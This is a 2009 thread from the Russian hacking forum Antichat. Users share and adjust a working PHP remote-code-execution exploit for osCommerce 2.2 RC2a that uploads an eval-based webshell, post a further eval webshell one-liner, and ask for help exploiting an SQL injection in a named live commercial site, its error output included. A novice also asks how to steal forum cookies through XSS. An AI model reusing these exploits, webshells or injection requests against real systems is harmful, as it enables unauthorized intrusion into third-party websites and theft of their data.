Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

12.11.2009, 15:35
|
|
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме: 20161
Репутация:
0
|
|
Сообщение от Aртем
хм... а в чем сложность запустить сплоит?
я его чуть-чуть подправил... но всё же, ты руками что-ли делаешь?
PHP код:
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='domain.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_GET[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
шел будет тут и запускаться так domain.com/fly.php?aifly=[PHP-КОД]
СПАСИБО!!! РАБОТАЕТ. 
|
|
|

12.11.2009, 15:36
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
Сообщение от jokester
Угу, ты хакер. Поменял
$host ='democn.51osc.com';
на
$host ='domain.com'; ? Круто!
=====================
sideup
Залей туда
<?php eval(stripslashes($_REQUEST[ev])); ?>
и обратись к скрипту вот так:
shell.php?ev=phpinfo();
=======================
Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся 
|
|
|

12.11.2009, 15:41
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Aртем
Угу, внимательный мистер. Вообще-то если ты не заметил по предыдущем постам, sideup, запрашивал через GET eval() когда ОН РУССКИМИ БУКВАМИ БЕРЕТ ТОЛЬКО POST. Не выебывайся 
Дружище, не нужно советовать новичкам работать с Гетом. И уж тем более не нужно исправлять нормальные сплоиты для работы через гет. Можно было объяснить, как отправлять пост данные в таком случае.
А то потом получаются недохакеры и баги нормальные палятся админами после таких чудесных доработок
|
|
|

12.11.2009, 15:45
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
Сообщение от jokester
Дружище, не нужно советовать новичкам работать с Гетом. И уж тем более не нужно исправлять нормальные сплоиты для работы через гет. Можно было объяснить, как отправлять пост данные в таком случае.
А то потом получаются недохакеры и баги нормальные палятся админами после таких чудесных доработок
Уважаемый. Я очень сильно сомневаюсь, что нормальные администраторы забыли пропатчить свою CMS, после того, как опубликовался сплоит на милворме, а после этого, ты хоть пост, хоть гет, хоть через сессию юзай сплоиты и шелы.
И потом:
<title>Форум АНТИЧАТ - безопасность WEB - интерфейсов</title>
По-этому здесь должны советовать не только как заюзать паблик сплоит, что бы админы не узнали о критической уязвимости  а еще и советовать как это дело поправить
Не путай паблик и приват 
Последний раз редактировалось Aртем; 12.11.2009 в 15:47..
|
|
|

12.11.2009, 19:11
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 7
Провел на форуме: 9855
Репутация:
0
|
|
Просканировал один форум черех Xspider 7.5 выдало куки подскажите с ними можно чтонить зделать вот они:
1. snwfoum_u=1; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
2. snwfoum_k=; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
3. snwfoum_sid=6743b15f8fe25caed4d19aeb436c49a3; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
|
|
|

12.11.2009, 19:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Молодец, ты получил доступ к гостевым кукам, которые сайт устанавливает для любого посетителя
|
|
|

12.11.2009, 19:23
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме: 330834
Репутация:
90
|
|
Сообщение от Kadness
Просканировал один форум черех Xspider 7.5 выдало куки подскажите с ними можно чтонить зделать вот они:
1. snwfoum_u=1; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
2. snwfoum_k=; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
3. snwfoum_sid=6743b15f8fe25caed4d19aeb436c49a3; expires=Fri, 12-Nov-2010 11:54:05 GMT; path=/; domain=forum.snw.ru; HttpOnly
нет.
|
|
|

12.11.2009, 19:29
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
аналогично посту на котором постил вчера(нестандартный скул), вот еще одинь но теперь MySQLi.
Код:
http://www.mytradingrobot.com/amember/signup.php?product_id=1')&paysys_id_not_required=&paysys_id=free&name_f=111-222-1934email@address.tst&name_l=111-222-1934email@address.tst&email=sample4%40email%2Etst&login=Jottiorg&pass0=111-222-1934email@address.tst&pass1=111-222-1934email@address.tst&do_payment=1&price_group=111-222-1934email@address.tst
выдает:
MYSQL ERROR:<br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '2009-11-12', '2009-12-12', 'free', '0', 0, '81.95.235.1' at line 6<br />in query:<br />INSERT INTO amember_payments (member_id, product_id, begin_date, expire_date, paysys_id, amount, completed, remote_addr, data, time, tm_added, tax_amount) VALUES ('2938', '1')', '2009-11-12', '2009-12-12', 'free', '0', 0, '181.100.25.16', 'a:4:{s:15:\"COUPON_DISCOUNT\";d:0;s:10:\"TAX_AMOU NT\";d:0;s:5:\"TAXES\";a:0:{}i:0;a:15:{s:10:\"prod uct_id\";s:3:\"1\')\";s:22:\"paysys_id_not_require d\";s:0:\"\";s:9:\"paysys_id\";s:4:\"free\";s:6:\" name_f\";s:29:\"111-222-1934email@address.tst\";s:6:\"name_l\";s:29:\"111-222-1934email@address.tst\";s:5:\"email\";s:17:\"sampl e4@email.tst\";s:5:\"login\";s:8:\"jottiorg\";s:5: \"pass0\";s:6:\"******\";s:5:\"pass1\";s:6:\"***** *\";s:10:\"do_payment\";s:1:\"1\";s:11:\"price_gro up\";s:29:\"111-222-1934email@address.tst\";s:6:\"aff_id\";N;s:14:\"em ail_verified\";i:-1;s:15:\"BASKET_PRODUCTS\";a:1:{i:0;s:3:\"1\')\";} s:13:\"BASKET_PRICES\";a:1:{i:1;d:0;}}}', NOW(), NOW(), '0')
прочел статьи Elekt и kot777 не помогает. Помогите раскрутит
Последний раз редактировалось YuNi|[c; 12.11.2009 в 19:32..
|
|
|

12.11.2009, 19:46
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 7
Провел на форуме: 9855
Репутация:
0
|
|
Есть еще уязвимость называется SQL иньекция как ее юзать ктонить знает???Или есть какая-нибуть прога для кражи куки с форумов?На ютубе видел видео как крали через какуюта прогу!!!
|
|
|

12.11.2009, 20:04
|
|
Новичок
Регистрация: 12.11.2009
Сообщений: 7
Провел на форуме: 9855
Репутация:
0
|
|
А про XSS можно по подробнее как красть или где можно почитать???В гугле полазил толком ничего не нашел(((
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|